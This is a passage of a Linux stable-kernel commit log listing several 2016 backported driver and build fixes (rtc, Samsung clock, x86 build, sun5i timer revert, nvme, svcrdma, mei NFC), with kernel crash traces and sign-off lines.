Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com>
Signed-off-by: Martin Schwidefsky <schwidefsky@de.ibm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

06bb5ebe

rtc: pcf2123: Add missing error code assignment before test · 1ef1bd02

Christophe JAILLET authored Aug 09, 2016

commit 83ab7dad upstream.

It is likely that checking the result of 'pcf2123_write_reg' is expected
here.
Also fix a small style issue. The '{' at the beginning of the function
is misplaced.

Fixes: 809b453b ("rtc: pcf2123: clean up writes to the rtc chip")
Signed-off-by: Christophe JAILLET <christophe.jaillet@wanadoo.fr>
Signed-off-by: Alexandre Belloni <alexandre.belloni@free-electrons.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

1ef1bd02

clk: samsung: clk-exynos-audss: Fix module autoload · 4baabb72

Javier Martinez Canillas authored Oct 16, 2016

commit 34b89b29 upstream.

If the driver is built as a module, autoload won't work because the module
alias information is not filled. So user-space can't match the registered
device with the corresponding module.

Export the module alias information using the MODULE_DEVICE_TABLE() macro.

Before this patch:

$ modinfo drivers/clk/samsung/clk-exynos-audss.ko | grep alias
alias:          platform:exynos-audss-clk

After this patch:

$ modinfo drivers/clk/samsung/clk-exynos-audss.ko | grep alias
alias:          platform:exynos-audss-clk
alias:          of:N*T*Csamsung,exynos5420-audss-clockC*
alias:          of:N*T*Csamsung,exynos5420-audss-clock
alias:          of:N*T*Csamsung,exynos5410-audss-clockC*
alias:          of:N*T*Csamsung,exynos5410-audss-clock
alias:          of:N*T*Csamsung,exynos5250-audss-clockC*
alias:          of:N*T*Csamsung,exynos5250-audss-clock
alias:          of:N*T*Csamsung,exynos4210-audss-clockC*
alias:          of:N*T*Csamsung,exynos4210-audss-clock

Fixes: 4d252fd5 ("clk: samsung: Allow modular build of the Audio Subsystem CLKCON driver")
Signed-off-by: Javier Martinez Canillas <javier@osg.samsung.com>
Reviewed-by: Krzysztof Kozlowski <krzk@kernel.org>
Tested-by: Krzysztof Kozlowski <krzk@kernel.org>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

4baabb72

x86/build: Fix build with older GCC versions · 3bbdbd8a

Jan Beulich authored Oct 24, 2016

commit a2209b74 upstream.

Older GCC (observed with 4.1.x) doesn't support -Wno-override-init and
also doesn't ignore unknown -Wno-* options.
Signed-off-by: Jan Beulich <jbeulich@suse.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: Valdis Kletnieks <valdis.kletnieks@vt.edu>
Cc: Valdis.Kletnieks@vt.edu
Fixes: 5e44258d "x86/build: Reduce the W=1 warnings noise when compiling x86 syscall tables"
Link: http://lkml.kernel.org/r/580E3E1C02000078001191C4@prv-mh.provo.novell.comSigned-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

3bbdbd8a

Revert "clocksource/drivers/timer_sun5i: Replace code by clocksource_mmio_init" · f5eadc27

Chen-Yu Tsai authored Oct 18, 2016

commit 59387683 upstream.

struct clocksource is also used by the clk notifier callback, to
unregister and re-register the clocksource with a different clock rate.
clocksource_mmio_init does not pass back a pointer to the struct used,
and the clk notifier callback assumes that the struct clocksource in
struct sun5i_timer_clksrc is valid. This results in a kernel NULL
pointer dereference when the hstimer clock is changed:

Unable to handle kernel NULL pointer dereference at virtual address 00000004
[<c03a4678>] (clocksource_unbind) from [<c03a46d4>] (clocksource_unregister+0x2c/0x44)
[<c03a46d4>] (clocksource_unregister) from [<c0a6f350>] (sun5i_rate_cb_clksrc+0x34/0x3c)
[<c0a6f350>] (sun5i_rate_cb_clksrc) from [<c035ea50>] (notifier_call_chain+0x44/0x84)
[<c035ea50>] (notifier_call_chain) from [<c035edc0>] (__srcu_notifier_call_chain+0x44/0x60)
[<c035edc0>] (__srcu_notifier_call_chain) from [<c035edf4>] (srcu_notifier_call_chain+0x18/0x20)
[<c035edf4>] (srcu_notifier_call_chain) from [<c0670174>] (__clk_notify+0x70/0x7c)
[<c0670174>] (__clk_notify) from [<c06702c0>] (clk_propagate_rate_change+0xa4/0xc4)
[<c06702c0>] (clk_propagate_rate_change) from [<c0670288>] (clk_propagate_rate_change+0x6c/0xc4)

Revert the commit for now. clocksource_mmio_init can be made to pass back
a pointer, but the code churn and usage of an inner struct might not be
worth it.

Fixes: 157dfade ("clocksource/drivers/timer_sun5i: Replace code by clocksource_mmio_init")
Reported-by: Maxime Ripard <maxime.ripard@free-electrons.com>
Signed-off-by: Chen-Yu Tsai <wens@csie.org>
Cc: linux-sunxi@googlegroups.com
Cc: Daniel Lezcano <daniel.lezcano@linaro.org>
Cc: linux-arm-kernel@lists.infradead.org
Link: http://lkml.kernel.org/r/20161018054918.26855-1-wens@csie.orgSigned-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

f5eadc27

nvme: Delete created IO queues on reset · 645a6b82

Keith Busch authored Oct 12, 2016

commit 70659060 upstream.

The driver was decrementing the online_queues prior to attempting to
delete those IO queues, so the driver ended up not requesting the
controller delete any. This patch saves the online_queues prior to
suspending them, and adds that parameter for deleting io queues.

Fixes: c21377f8 ("nvme: Suspend all queues before deletion")
Signed-off-by: Keith Busch <keith.busch@intel.com>
Reviewed-by: Christoph Hellwig <hch@lst.de>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

645a6b82

svcrdma: Tail iovec leaves an orphaned DMA mapping · 07c4cbe0

Chuck Lever authored Sep 13, 2016

commit cace564f upstream.

The ctxt's count field is overloaded to mean the number of pages in
the ctxt->page array and the number of SGEs in the ctxt->sge array.
Typically these two numbers are the same.

However, when an inline RPC reply is constructed from an xdr_buf
with a tail iovec, the head and tail often occupy the same page,
but each are DMA mapped independently. In that case, ->count equals
the number of pages, but it does not equal the number of SGEs.
There's one more SGE, for the tail iovec. Hence there is one more
DMA mapping than there are pages in the ctxt->page array.

This isn't a real problem until the server's iommu is enabled. Then
each RPC reply that has content in that iovec orphans a DMA mapping
that consists of real resources.

krb5i and krb5p always populate that tail iovec. After a couple
million sent krb5i/p RPC replies, the NFS server starts behaving
erratically. Reboot is needed to clear the problem.

Fixes: 9d11b51c ("svcrdma: Fix send_reply() scatter/gather set-up")
Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: J. Bruce Fields <bfields@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

07c4cbe0

svcrdma: Skip put_page() when send_reply() fails · 4131e00a

Chuck Lever authored Sep 13, 2016

commit 9995237b upstream.

Message from syslogd@klimt at Aug 18 17:00:37 ...
kernel:page:ffffea0020639b00 count:0 mapcount:0 mapping: (null) index:0x0
Aug 18 17:00:37 klimt kernel: flags: 0x2fffff80000000()
Aug 18 17:00:37 klimt kernel: page dumped because: VM_BUG_ON_PAGE(page_ref_count(page) == 0)

Aug 18 17:00:37 klimt kernel: kernel BUG at /home/cel/src/linux/linux-2.6/include/linux/mm.h:445!
Aug 18 17:00:37 klimt kernel: RIP: 0010:[<ffffffffa05c21c1>] svc_rdma_sendto+0x641/0x820 [rpcrdma]

send_reply() assigns its page argument as the first page of ctxt. On
error, send_reply() already invokes svc_rdma_put_context(ctxt, 1);
which does a put_page() on that very page. No need to do that again
as svc_rdma_sendto exits.

Fixes: 3e1eeb98 ("svcrdma: Close connection when a send error occurs")
Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: J. Bruce Fields <bfields@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

4131e00a

mei: bus: fix received data size check in NFC fixup · 755ab7aa

Alexander Usyskin authored Oct 31, 2016

commit 582ab27a upstream.

NFC version reply size checked against only header size, not against
full message size. That may lead potentially to uninitialized memory access
in version data.

That leads to warnings when version data is accessed:
drivers/misc/mei/bus-fixup.c: warning: '*((void *)&ver+11)' may be used uninitialized in this function [-Wuninitialized]:  => 212:2

Reported in
Build regressions/improvements in v4.9-rc3
https://lkml.org/lkml/2016/10/30/57

Fixes: 59fcd7c6 (mei: nfc: Initial nfc implementation)
Signed-off-by: Alexander Usyskin <alexander.usyskin@intel.com>
Signed-off-by: Tomas Winkler <tomas.winkler@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

755ab7aa